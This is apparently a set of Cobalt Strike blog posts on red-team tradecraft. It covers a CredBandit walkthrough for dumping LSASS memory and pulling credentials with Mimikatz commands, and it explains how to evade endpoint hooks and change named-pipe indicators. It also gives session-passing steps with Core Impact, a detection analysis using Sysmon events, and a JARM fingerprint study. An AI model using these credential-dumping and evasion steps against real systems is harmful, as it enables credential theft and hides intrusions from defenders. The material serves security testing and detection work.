One of the things I find fascinating about being on the Cobalt Strike team is the community. It is amazing to see how people overcome unique challenges and push the tool in directions never considered. I want explore this with CredBandit ( This tool has had updates since I started exploring. I’m specifically, looking at this version for this blog post.

In part 2, I ‘ll explore the latest version and how it uses an “undocumented” feature to solve the challenges discussed in this post.

Per the author:

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions, which allows us to write the dump to memory. Additionally, the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump.
When you dig into this tool,  you will see that CredBandit is “just another minidump tool.” This is true, but there are some interesting approaches to this.
My interest in CredBandit is less from the minidump implementation but the “duct tape engineering” used to bend Beacon to anthemtotheego‘s will.

CredBandit uses an unconventional way of transferring in memory data through Beacon by overloading the BEACON_OUTPUT aggressor function to handle data sent from BeaconPrintf() function.

There are other interesting aspects to this project, namely:

    • Beacon Object File (BOF) using direct syscalls
    • In memory storage of data (The dump does not need to be written to disk)
    • ReactOS implementation of MiniDumpWriteDump
You can read more about the minidump technique here (T1003-001) or here (Dump credentials from lsass without mimikatz).

Note on the Defense Perspective

Although the focus on this post is to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in security operations. It can be helpful to highlight both the offense capabilities and defense opportunities of a technique. I’ve invited Jonny Johnson ( to add context to the detection story of this technique, seen below in the Detection Opportunities section.

Quick Start

Warning: BOFs run in Beacon’s memory. If they crash, Beacon crashes. The stability of this BOF may not be 100% reliable. Beacons may die. It’s something to consider if you choose to use this or any other BOF.

CredBandit is easy to use, but don’t that fool you into thinking it isn’t a clever approach to creating a minidump. All the hard work has been done, and you only need a few commands to use it.

The basic process is as follows:

  1. Clone the project:
  2. Compile CredBandit to a BOF
  3. Load the aggressor script in Cobalt Strike
  4. Launch a beacon running in context with the necessary permissions (i.e., high integrity process running as administrator)
  5. Locate the PID of LSASS
  6. Run CredBandit
  7. Wait …. 🙂
  8. Convert the CredBandit output into a usable dump
  9. Use Mimikatz to extract information from the dump

Consult the readme for details.

Let’s See This in Action

Load the aggressor script from the Cobalt Strike manager

Get the PID of LSASS

Interact with a beacon running with the permissions needed to dump LSASS memory and get the PID of LSASS.

An output of PS gives us a PID of 656.

Run CredBandit to capture the minidump of LSASS

Loading the MiniDumpWriteDump.cna aggressor script added the command credBandit to Beacon.

Running help shows we only need the PID of LSASS to use the command credBandit.

This will take time. Beacon may appear to be unresponsive, but it is processing the minidump and sending back chunks of data by hijacking the BeaconPrintf function. In this example, over 80mb in data must be transferred.

Once the Dump is complete, Beacon should return to normal. A word of caution: I had a few Beacons die after the process completed. The data was successfully transferred, but the Beacon process died. This could be due to the BOF being functional but missing error handling, but I did not investigate.

NOTE: The CredBandit aggressor script, MiniDumpWriteDump.cna, changed the behavior of BEACON_OUTPUT. This can cause other functions to fail. You should unload the script and restart the Cobalt Strike client or use RevertMiniDumpWriteDump.cna to reverse the changes.

Convert the extracted data to a usable format

The file dumpFile.txt is created in the cobaltstrike directory. This file is the result generated by  “highjacking” the BEACON_OUTPUT function to write the received chunks of data from the BeaconPrintf function.

Run the command to convert this file back into something useful:


You will now have two new files in the cobaltstrike directory: .dmp and .txt.

The .txt is a backup of the original dumpFile.txt.

The .dmp is the minidump file of LSASS.

Use Mimikatz to extract information from the dump

At this point, we are done with CredBandit. It provided the dump of LSASS. We can now use Mimikatz offline to extract information.

You can use something like the following commands:

mimikatz # sekurlsa::minidump c:\payloads\credBandit\lsass.dmp
mimikatz # sekurlsa::logonPasswords

BTW, dontstealmypassword


Here is a quick demo of the tool.

Breaking down the key concepts

Beacon Object File (BOF) using direct syscalls

Direct syscalls can provide a way of avoiding API hooking from security tools by avoiding the need for calling these APIs.

CredBandit uses much of work done by Outflank on using Syscall in Beacon Object Files. I won’t spend time on this but here are great resources:

In memory storage of data

The minidump output is stored in Beacon’s memory vs. being written to disk. This is based on using a minidump implementation that uses NTFS transactions to write to memory:

ReactOS implementation of MiniDumpWriteDump

MiniDumpWriteDump API is replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump:

Unconventional way of transferring in memory data through Beacon via overloaded BeaconPrintf() function

This is what I find most interesting about this project. In short, the BEACON_OUTPUT aggressor function is used to send the base64 encode dump it receives as chunks from BeaconPrintf. These chunks are written to a file that can be cleaned up and decoded.

How does this hack work? It’s clever and simple. The BOF uses the BeaconPrintf function to send chunks of the base64 encoded minidump file to the teamserver. This data is captured and written to a file on disk.

The following is an example of the output file:

received output:
received output:
received output:
received output:

This minidump file is rebuilt using the script Credential material can be extracted using Mimikatz.

 Adjusting the Technique

The heart of this technique is based on accessing and dumping LSASS. Instead of using the suspicious activity of payload.exe accessing lsass.exe, you could find a process that regularly accesses LSASS, inject into that process, and perform your dump.

The BOF ( may help you locate a process that has a handle to lsass.exe using similar OPSEC as CredBandit by using a BOF and direct systems calls. FindObjects-BOF is “A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles.

Give it a try!

Detection Opportunities

Although the focus on this post was to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in detection engineering. I’ve invited Jonny Johnson ( to provide context to the detection story of this technique.

Jonny’s detection note are in the left column, and I hae added my take in the right.

Detection Story by Jonny Joe’s comments
Before we can start creating our detection we must identify what is the main action of this whole chain – opening a handle to LSASS. That will be the core of this detection. If we detect on the tool or code specifically, then we lose detection visibility once someone creates another code that uses different functions. By focusing on the technique’s core behavior, we prevent manually creating a gap in our detection strategy. For this piece I am going to leverage Sysmon Event ID: 10 – Process Accessed. This event allows me to see the source process that was requesting access to the target process, the target process, the granted access rights (explained in a moment), along with both the source process GUID and target process GUID.

Sysmon Event ID 10 fires when OpenProcess is called, and because Sysmon is a kernel driver, it has insight into OpenProcess in both user-mode and kernel-mode. This particular implementation uses a syscall for NtOpenProcess within ntdll.dll, which is the Native API version of the Win32 API OpenProcess.

How is this useful?

Within the NtOpenProcess documentation, there is a parameter called DesiredAccess.This correlates to the ACCESS_MASK type, which is a bitmask. This access is typically defined by the function that wants to obtain a handle to a process. OpenProcess acts as a middle man between the function call and the target process. The function in this instance is MiniDumpWriteDump. Although ReactOS’s implementation of MiniDumpWriteDump is being used, we are still dealing with Windows securable objects (e.g. processes and files). Due to this, we must follow Windows built-in rules for these objects. Also, ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.

Don’t overemphasize tools. Fundamentally, this technique is based on the detection a process accessing LSASS.

ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.” It is important to focus on the technique’s primitives. There can be multiple implementations by different tools but the technique can often be broken down in to primitives.

Within Microsoft’s documentation, we can see that if MiniDumpWriteDump wants to obtain a handle to a process, it must have PROCESS_QUERY_IMFORMATION & PROCESS_VM_READ access to that process, which we can see is requested in the CredBandit source code below:

However, this still isn’t the minimum rights that a process needs to perform this action on another process. After reading Microsoft’s Process Security and Access Rights we can see that anytime a process is granted PROCESS_QUERY_IMFORMATION, it is automatically granted PROCESS_QUERY_LIMITED_IMFORMATION. This has a hex value of 0x1410 (this will be used in the analytic later).

Next, we want to see the file created via NtCreateTransacted. Sysmon uses a minifilter driver to monitor file system’s stacks indirectly, so it has insight into files being written to disk or a phantom file. One thing we have to be careful with is that we don’t know the extension the actor might have for the dump file. Bottom line: this is attacker-controlled and if we specify this into our analytic we risk creating a blind spot, which can lead to an analytical bypass.

Lastly, a little icing on the cake would be to add a process creation event to this analytic as it would just provide context around which user was leveraged for this activity.

Data Sources/Events:

User Rights:

Process Access:

File Creation:

  • Sysmon Event ID 11

Process Creation:

A detection strategy hypothesis should account for potential blind spots. Blind spots are not bad, but should be identified.


The following analytics are not meant to be copy and paste, but more of the beginning of detection for your environment. If you only look for the access rights 0x1410, then you will create a blind spot if an actor uses ReadProcessMemory to dump LSASS. Ideally, multiple detections would be made for dumping LSASS so that blind spots could be covered along the way.

Sysmon EID 10 Process Access

Regarding Detection:

Multiple combinations of access rights may be requested based on the implementation. Focus on a query to cover minimal rights needed. This will reduce blind spots based on a specific implementation.

Regarding OPSEC:

Notice that payload.exe is accessing lsass.exe. This is due to this implementation as a BOF running directly under the context of Beacon.

BOF and syscalls can be great, but maintain OPSEC awareness.

Sysmon EID 10 & EID 11

Sysmon EID 10, 11, & 1

Detection Summary

When writing a detection the first thing I do is identify the capabilities that a tool and/or technique has. This helps me narrow in on a scope. A piece of code could be implementing 3-4 techniques. When this happens, I separate these techniques and look into them separately. This allows me to create a detection strategy per capability.
When the capability is identified and the components being used are highlighted, proper scoping can be applied. We can see a commonality between this implementation and many others. That commonality is MiniDumpWriteDump and the access rights needed for that function call. This is the foundation of our detection or base condition. However, this could be evaded if an actor uses ReadProcessMemory because there are a different set of minimum access rights needed. A separate detection would need to be created for this function. This is ideal as it applies an overlap of our detection to cover the blind spots that are related to a technique.
Pulling attributes like file creation and process creation are contextual attributes that can be applied back to the core detection (MiniDump). The detection shouldn’t rely on these attributes because they are not guaranteed to be present.

Cobalt Strike is not inherently malicious. It is simply a way for someone to implement an action. The intent behind that action is what determines a classification of malicious or benign. Consequently, I don’t focus on Cobalt Strike specific signatures, I look at the behavior/technique being implemented.

I like how Palantir outlines a method for documenting detection strategies using their Alerting and Detection Strategy Framework (ADS).
Jonny Johnson (

Thanks to  for creating this tool.

Stay tuned for part 2 where I ‘ll talk about how the latest version uses an “undocumented” feature to download the minidump file instead of hijacking the BEACON_OUTPUT function.


Wait?!?! This post highlighted the need to ‘hack’ Cobalt Strike because of a lack of features.  Why isn’t this part of the toolset?

Cobalt Strike is a framework. It is meant to be tuned to fit a user’s need. Projects like this help expose areas that can be improved. This helps the team add new features, update documentation, or provide examples.


Detection References:

Learn Pipe Fitting for all of your Offense Projects

Named pipes are a method of inter-process communication in Windows. They’re used primarily for local processes to communicate with eachother. They can also facilitate communication between two processes on separate hosts. This traffic is encapsulated in the Microsoft SMB Protocol. If you ever hear someone refer to a named pipe transport as an SMB channel, this is why.

Cobalt Strike uses named pipes in several of its features. In this post, I’ll walk you through where Cobalt Strike uses named pipes, what the default pipename is, and how to change it. I’ll also share some tips to avoid named pipes in your Cobalt Strike attack chain too.

Where does Cobalt Strike use named pipes?

Cobalt Strike’s default Artifact Kit EXEs and DLLs use named pipes to launder shellcode in a way that defeats antivirus binary emulation circa 2014. It’s still the default. When you see \\.\pipe\MSSE-###-server that’s likely the default Cobalt Strike Artifact Kit binaries. You can change this via the Artifact Kit. Look at src-common/bypass-pipe.c in the Artifact Kit to see the implementation.

Cobalt Strike also uses named pipes for its payload staging in the jump psexec_psh module for lateral movement. This pipename is \\.\pipe\status_##. You can change the pipe via Malleable C2 (set pipename_stager).

Cobalt Strike uses named pipes in its SMB Beacon communication. The product has had this feature since 2013. It’s pretty cool. You can change the pipename via your profile and when you configure an SMB Beacon payload. I’m also aware of a few detections that target the content of the SMB Beacon feature too. The SMB Beacon uses a [length][data] pattern and these IOCs target predictable [length] values at the beginning of the traffic. The smb_frame_header Malleable C2 option pushes back on this. The default pipe is \\[target]\pipe\msagent_##.

Cobalt Strike uses named pipes for its SSH sessions to chain to a parent Beacon. The SSH client in Cobalt Strike is essentially an SMB Beacon as far as Cobalt Strike is concerned. You can change the pipename (as of 4.2) by setting ssh_pipename in your profile. The default name of this pipe (CS 4.2 and later) is \\.\pipe\postex_ssh_####.

Cobalt Strike uses named pipes for most of its post-exploitation jobs. We use named pipes for post-ex tools that inject into an explicit process (screenshot, keylog). Our fork&run tools largely use named pipes to communicate results back to Beacon too. F-Secure’s Detecting Cobalt Strike Default Modules via Named Pipe Analysis discusses this aspect of Cobalt Strike’s named pipes. We introduced the ability to change these pipenames in Cobalt Strike 4.2. Set post-ex -> pipename in your Malleable C2 profile. The default name for these pipes is \\.\pipe\postex_#### in Cobalt Strike 4.2 and later. Prior to 4.2, the default name was random-ish.

Pipe Fitting with Cobalt Strike

With the above, you’re now armed with knowledge of where Cobalt Strike uses named pipes. You’re also empowered to change their default names too. If you’re looking for a candidate pipename, use ls \\.\pipe from Beacon to quickly see a list of named pipes on a lived-in Windows system. This will give you plenty to choose from. Also, when you set your plausible pipe names, be aware that each # character is replaced with a random character (0-9a-f) as well.  And, one last tip: you can specify a comma-separated list of candidate pipe names in your ssh_pipename and post-ex -> pipename profile values. Cobalt Strike will pick from this list, at random, when one of these values is needed.

Simplify your Offense Plumbing

Cobalt Strike uses named pipes in several parts of its offense chain. These are largely optional though and you can avoid them with some care. For example, the default Artifact Kit uses named pipes; but this is not a requirement of the Artifact Kit. Our other Artifact Kit templates do not use named pipes. For lateral movement and peer-to-peer chaining of Beacons, the TCP Beacon is an option. To avoid named pipes from our SSH sessions, tunnel an external SSH client via a SOCKS proxy pivot. And, while a lot of our fork&run post-exploitation DLLs use named pipes for results, Beacon Object Files are another way to build and run post-exploitation tools on top of Beacon. The Beacon Object Files mechanism does not use named pipes.

Closing Thoughts

This post focused on named pipe names, but the concepts here apply to the rest of Cobalt Strike as well. In offense, knowing your IOCs and how to change or avoid them is key to success. Our goal with Cobalt Strike isn’t amazing and ever-changing default pipe names or IOCs. Our goal is flexibility. Our current and future work is to give you more control over your attack chain over time. To know today’s options, read Kits, Profiles, and Scripts… Oh my! This blog post summarizes ways to customize Cobalt Strike. Our late-2019 Red Team Operations with Cobalt Strike mixes these ideas into each lecture as well.

Interested in Trying Cobalt Strike?


Pushing back on userland hooks with Cobalt Strike

When I think about defense in the current era, I think of it as a game of instrumentation and telemetry. A well-instrumented endpoint provides a defense team and an automated security solution with the potential to react to or have visibility into a lot of events on a system. I say a lot, because certainly some actions are not easy to see [or practical to work with] via today’s instrumentation methods.

A popular method to instrument Windows endpoints is userland hooking. The process for this instrumentation looks like this:

(a) load a security product DLL into the process space [on process start, before the process starts to do anything]

(b) from the product DLL: installs hooks into certain APIs of interest. There are a lot of different ways to hook, but one of the most common is to patch the first instructions in a function-of-interest to jump to the vendor’s code, do the analysis, execute the patched over instructions, and resume the function just after the patch.

This method of instrumentation is popular because it’s easy-ish to implement, well understood, and was best practice in security products for a very long time. It’s still common in a lot of security technologies today.

The downside of the above instrumentation method is that it’s also suscpetible to tamper and attack by an adversary. The adversary’s code that lives in a process has the same rights and ability to examine and change code as the security product that installed itself there.

The above possibility is the impetus for this blog post. I’d like to walk you through a few strategies to subvert instrumentation implemented as userland hooks with the Cobalt Strike product.

Which products use hooks and what do they hook?

Each of these techniques does benefit from awareness of the endpoint security products in play and how [also, if] they use userland hooks to have visibility.  Devisha Rochlani did a lot of work to survey different products and document their hooks. Read the Anti-virus Artifacts papers for more on this.

To do target-specific leg work, consult Matt Hand’s Adventures in Dynamic Evasion. Matt discusses how to identify hooks in a customer’s environment right now and use that information to programatically craft a tailored evasion strategy.

Avoid Hooks with Direct System Calls

One way to defeat userland hooks is to avoid them by making system calls directly from our code.

A direct syscall is made by populating registers with arguments and a syscall number that corresponds to an API exposed to userland by the operating system kernel. The system call is then invoked with the syscall instruction. NTDLL is largely thin wrappers around these kernel APIs and is a place some products insert their hooks. By making syscalls directly from our code, and not calling them via NTDLL (or an API that calls them via NTDLL), we avoid these hooks.

The value of this technique is that we deny a security product visibility into our actions via this means. The downside is we have to adapt our code to working with these APIs specifically.

If a security product isn’t using userland hooks this technique provides no evasion value. If we use system calls for uninteresting (e.g., not hooked) actions–this technique provides no evasion value.

Also, be aware that direct system calls (outside of specific contexts, like NTDLL) can be disabled process-by-process in Windows 10. This is the ProcessSystemCallDisablePolicy. If something can be disabled, I surmise it can also be monitored and used for detection purposes too. This leads to a familiar situation. A technique that provides evasion utility now can also provide detection opportunities later on. This is a trueism with most things offense. Always keep it in mind when deciding whether or not to use a technique like this.

With the above out of the way, what are some opportunities to use system calls from Cobalt Strike’s Beacon?

One option is to use system calls in your EXE and DLL artifacts that run Cobalt Strike’s Beacon. The blog post Implementing Syscalls in the Cobalt Strike Artifact Kit walks through how to do this for Cobalt Strike’s EXEs and DLLs. The post’s author shared that VirtualAlloc, VirtualProtect, and CreateThread are calls some products hook to identify malicious activity. I’d also go further and say that if your artifact spawns a process and injects a payload into it, direct syscalls are a way to hide this behavior from some security stacks.

Another option is to use system calls within some of your Beacon post-exploitation activities. While Beacon doesn’t use direct system calls with any of its built-ins, you can define your own built-ins with Beacon Object Files. Cornelis de Plaa from Outflank authored Direct Syscalls from Beacon Object Files to demonstrate how to use Jackson T.‘s Syswhispers 1 (Syswhispers 2 just came out!) from Beacon Object Files. As a proof-of-concept, Cornelis released a Beacon Object File to restore plaintext credential caching in LSASS via an in-memory patch.

Building on the above, Alfie Champion used Outflank’s foundation and re-implemented Cobalt Strike’s shinject and shspawn as Beacon Object Files that use direct system calls. This provides a way to do process injection from Cobalt Strike, but evade detections that rely on userland hooks. The only thing that’s missing is some way for scripts to intercept Cobalt Strike’s built-in fork&run actions and override the built-in behaviors with a BOF. Hmmmmm.

Refresh DLLs to Remove Function Hooks

Another way to defeat userland hooks is to find hooks implemented as code patches and restore the functions to their original uninstrumented state. One way to do this is to find hooked DLLs in memory, read the original DLL from disk, and use that content to restore the mapped DLL to its unhooked state. This is DLL refreshing.

The simplest case of DLL refreshing is to act on NTDLL. NTDLL is a good candidate, because its really easy to refresh. You don’t have to worry about relocations and alternate API sets. NTDLL is also a good candidate because it’s a target for security product hooks! The NTDLL functions are often the lowest-level API that other Windows APIs call from userland. A well-placed hook in NTDLL will grant visibility into all of the userland APIs that use it.

You can refresh NTDLL within a Cobalt Strike Beacon with a Beacon Object File. Riccardo Ancarani put together a proof-of-concept to do this. Compile the code and use inline-execute to run it.

If NTDLL is not enough, you can refresh all of the DLLs in your current process. This path has more peril though. The DLL refreshing implementation needs to account for relocations, apisets, and other stuff that makes the unhooked code on disk differ from the unhooked code in memory. Jeff Tang from Cylance’s Red Team undertook this daunting task in 2017 and released their Universal Unhooker (whitepaper).

I’ve put together a Beacon Object File implementation of Cylance’s Universal Unhooker. The script for this BOF adds an unhook alias to Beacon. Type unhook and Beacon will pass control to the unhooker code, let it do its thing, and then return control back to Beacon.

Both of these techniques are great options to clean your Beacon process space before you start into other offense activities.

While the above are Beacon Object Files and presume that your Beacon is already loaded, you may also find it’s worthwhile to implement DLL refreshing in your initial access artifact too. Like direct system calls, this is a way to defeat userland hooking visibility that could affect your agent loading or its initial communications.

Prevent Hooks via Windows Process Mitigations

So far, we’ve discussed ways to defeat hooks by either avoiding them or undoing them. It’s possible to prevent hooking altogether too.

I became interested in this approach, when I learned that Google Chrome takes many steps to prevent security products from loading into its process space. Google was tired of entertaining crash reports from poorly implemented endpoint security products and opted to fight back against this in their own code. I share Google’s concerns about allowing an endpoint security product to share space with my post-exploitation code. My reasons are different, but we’re very much aligned on this cause!

The above led me to experiment with the Windows 10 process mitigation policy, BinarySignaturePolicy. A process run with a BinarySignaturePolicy of MicrosoftSignedOnly will refuse to load any DLL not signed by Microsoft into that process space. This mitigation prevents some security products from loading their DLLs into the new process space.

I opted to use the above to implement blockdlls in Cobalt Strike 3.14. blockdlls is a session prepping command to run processes with this flag set. The idea of blockdlls is processes spawned by Beacon will be free to act with less scrutiny, in some situations.

There are caveats to blockdlls. The mitigation is a recent-ish Windows 10 addition. It doesn’t work on versions of Windows where this mitigation isn’t implemented. Duh! And, security vendors do have the option to get Microsoft to sign their DLLs via an attestation service offered by Microsoft. A few made this exact move after Cobalt Strike weaponized this mitigation in version 3.14.

For more information on this technique and its variations, read Adam Chester’s Protecting Your malware with blockdlls and ACG. It’s a great overview of the technique and also discusses variations of the same idea.

Like direct system calls, I see the use of process mitigations as an evasion that is also potentially its own tell. Be aware of this tradeoff. Also, like direct system calls, this is an option that has use both during post-exploitation and in an initial access artifact. Any initial access artifact that performs migration (again, Cobalt Strike’s service executables do this) could benefit from this approach in some security stacks too.

Closing Thoughts

And, there you have it. This blog posted presented a few different techniques to defeat userland hooks with Cobalt Strike. Better, each of these techniques delivers benefit at different places in Cobalt Strike’s engagement cycle.

Be aware that each of these methods is beneficial in very specific circumstances. None of the above will have impact against technologies that do not use userland hooks for instrumentation. Offense is always about trade-offs. Knowing the techniques available to you and knowing their trade-offs will help you assess your situation and decide the best way forward. This is key to good security testing engagements.

Agent Deployed: Core Impact and Cobalt Strike Interoperability

Core Impact 20.3 has shipped this week. With this release, we’re revealing patterns for interoperability between Core Impact and Cobalt Strike. In this post, I’ll walk you through these patterns and provide advice on how to get benefit using Cobalt Strike and Core Impact together.

A Red Team Operator’s Introduction to Core Impact

Prior to jumping into the patterns, I’d like to introduce you to Core Impact with my voice. Core Impact is a commercial penetration testing tool and exploit framework that has had continuous development since 1998.

Impact is a collection of remote, local, and client-side attacks for public vulnerabilities and other common offense actions. We implement [with special attention to QA] our own exploits as well. While we announce 2-3 product updates per year, we push new modules and module updates in between releases too.

Impact is also a collection of post-exploitation agents for Windows, Linux, other *NIX flavors (to include OS X), and Cisco IOS. While Windows has the most features and best support, our *NIX agents are robust and useful. The pivoting model and interface for these platforms is largely unified. The Impact agent is one of my favorite parts of the product.

Core Impact also has a graphical user interface to bring all of these things together. It’s quirky and does have a learning curve. But, once you grok the ideas behind it, the product clicks and it is thought out.

While Core Impact was long-marketed as a vulnerability verification tool [notice: I’m not mentioning the automation], it’s clear to me that the product was architected by hackers. This hacker side of Core Impact is what I’d like to show you in this video walk-through:

Session Passing from Core Impact to Cobalt Strike

One of the most important forms of tool interoperability is the ability to pass sessions between platforms.

Core Impact 20.3 includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module does support spawning code x86 -> x86, x64 -> x64, and x64 -> x86.

To pass a session from Core Impact to Cobalt Strike:

[Cobalt Strike]

1. Go to Attacks -> Packages -> Windows EXE (S)
2. Press … to choose your listener
3. Change Output to raw
4. Check x64 if you wish to export an x64 payload.
5. Press Generate and save the file

[Core Impact]

1. Right-click on the desired agent and click Set as Source
2. Find the Run shellcode in temporary process module and double-click it.
3. Set ARCHITECTURE to x86-64 if you exported an x64 payload
4. Set FILENAME to the file generated by Cobalt Strike
5. Press OK

This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.

Session Passing from Cobalt Strike to Core Impact

You can also spawn a Core Impact agent from Cobalt Strike too. If Core Impact and Cobalt Strike can reach the same network, this pattern is a light way to turn an access obtained with Beacon (e.g., via phishing, lateral movement, etc.) into an Impact agent.

[Core Impact]

1. Find the Package and Register Agent module and double-click it.
2. Change ARCHITECTURE to x86-64 if you’d like to export an x64 agent
3. Change BINARY TYPE to raw
4. Change TARGET FILE to where you would like to save the file
5. Expand Agent Connection
6. Change CONNECTION METHOD and PORT to fit your preference. I find the Connect from target (reverse TCP connection) is the most performant.

[Cobalt Strike]

1. Interact with a Beacon
2. Type shspawn x64 if you exported an x64 agent. Type shspawn x86 if you exported an x86 agent.
3. Find the file that you exported.
4. Press Open.

In a few moments, you should hear that famous New Agent Deployed wav.

Tunnel Core Impact exploits through Cobalt Strike

Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.

As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.

Cobalt Strike 4.2 introduced the spunnel command to spawn Core Impact’s Windows agent in a temporary process and create a localhost-only reverse port forward for it. Here are the steps to tunnel Core Impact’s agent with spunnel:

[Core Impact]

1. Click the Modules tab in the Core Impact user interface
2. Search for Package and Register Agent
3. Double-click this module
4. Change Platform to Windows
5. Change Architecture to x86-64
6. Change Binary Type to raw
7. Click Target File and press … to decide where to save the output.
8. Go to Agent Connection
9. Change Connection Method to Connect from Target
10. Change Connect Back Hostname to
11. Change Port to some value (e.g., 9000) and remember it.
12. Press OK.

[Cobalt Strike]

1. Interact with a Beacon
2. Type spunnel x64 [impact IP address] 9000 and press enter.
3. Find the file that you exported.
4. Press Open.

This similar to passing a session from Cobalt Strike to Core Impact. The difference here is the Impact agent’s traffic is tunneled through Cobalt Strike’s Beacon payload.

What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too. Run a Cobalt Strike client from the same Windows system that Core Impact is installed onto. Connect this Cobalt Strike client to your team server. In this setup, run spunnel_local x64 9000 to spawn and tunnel the Impact agent through Beacon. The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client. The spunnel_local command was designed for this exact situation.

Next step: Request a trial

The above options are our patterns for interoperability between Core Impact and Cobalt Strike.

If you have Cobalt Strike and would like to try these patterns with Core Impact, we recommend that you request a trial of Core Impact and try it out.

A Red Teamer Plays with JARM

I spent a little time looking into Saleforce’s JARM tool released in November. JARM is an active tool to probe the TLS/SSL stack of a listening internet application and generate a hash that’s unique to that specific TLS/SSL stack.

One of the initial JARM fingerprints of interest relates to Cobalt Strike. The value associated with Cobalt Strike is:


To generate a JARM fingerprint for an application, use the JARM python tool:

python3 [target] -p [port]

I opted to dig into this, because I wanted to get a sense of whether the fingerprint is Cobalt Strike or Java.

Cobalt Strike’s JARM Fingerprint is Java’s JARM Fingerprint

I started my work with a hypothesis: Cobalt Strike’s JARM fingerprint is Java’s JARM fingerprint. To validate this, I created a simple Java SSL server application (listens on port 1234) in Sleep.


$factory = [SSLServerSocketFactory getDefault];
$server  = [$factory createServerSocket: 1234];
[$server setSoTimeout: 0];

if (checkError($error)) {

while (true) {
$socket = [$server accept];
[$socket startHandshake];
[$socket close];

I ran this server from Java 11 with:

java -jar sleep.jar

I assessed its JARM fingerprint as:


Interesting! This fingerprint does not match the supposed Cobalt Strike fingerprint. Does this mean we’re done? No.

The current popular use of JARM is to fingerprint web server applications listening on port 443. This implies that these servers have a certificate associated with their TLS communications. Does this change the above JARM fingerprint? Let’s setup an experiment to find out.

I generated a Java keystore with a self-signed certificate and I directed my simple server to use it:

keytool -keystore ./ -storepass 123456 -keypass 123456 -genkey -keyalg RSA -dname “CN=,OU=,O=,L=,S=,C=”
java -jar sleep.jar

The JARM result:


Interesting. We’ve validated that the above JARM fingerprint is specific to a Java 11 TLS stack.

Another question: is the JARM fingerprint affected by Java version? I setup several experiments and validated that yes, different major Java versions have different JARM fingerprints in the above circumstance.

How many Java-native Web servers are on the internet?

Part of the value of JARM is to turn the internet haystack into something smaller for an analyst to sift through. I wanted to get a sense of how much Java is on the internet. Fortunately, this analysis was easy thanks to some timely and available data. Silas Cutler had scanned the internet for port 443 and obtained JARM values for each of these hosts. This data was made available as an SQLite database too. Counting through this data was a relatively easy exercise of:

sqlite> .open jarm.sqlite
sqlite> select COUNT(ip) FROM jarm WHERE hash = “[hash here]”;

Here’s what I found digging through this data:

Application Count JARM Hash
Java 1.8.0 21,099 07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175
Java 1.9.0 9 05d14d16d04d04d05c05d14d05d04d4606ef7946105f20b303b9a05200e829
Java 11.05 2,957 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
Java 13.01 0 2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53

I went a slight step further with this data. I opted to convert the Java 11.05 data to hostnames and eyeball what appeared as interesting. I found several mail servers. I did not investigate which application they are. I found an instance of Burp Intruder (corroborating Salesforce’s blog post). I also found several instances of Oracle Peoplesoft as well. These JARM hashes are a fingerprint for Java applications, in general.

Closing Thoughts

For defenders, I wouldn’t act on a JARM value as proof of application identity alone. For red teamers, this is a good reminder to think about pro-active identification of command and control servers. This is a commoditized threat intelligence practice. If your blue team uses this type of information, there are a lot of options to protect your infrastructure. Part 3 of Red Team Operations with Cobalt Strike covers this topic starting at 1h 26m 15s:

JARM is a pretty cool way to probe a server and learn more about what it’s running. I’d love to see a database of JARM hashes and which applications they map to as a reconaissance tool. The C2 fingerprinting is a neat application of JARM too. It’s a good reminder to keep up on your infrastructure OPSEC.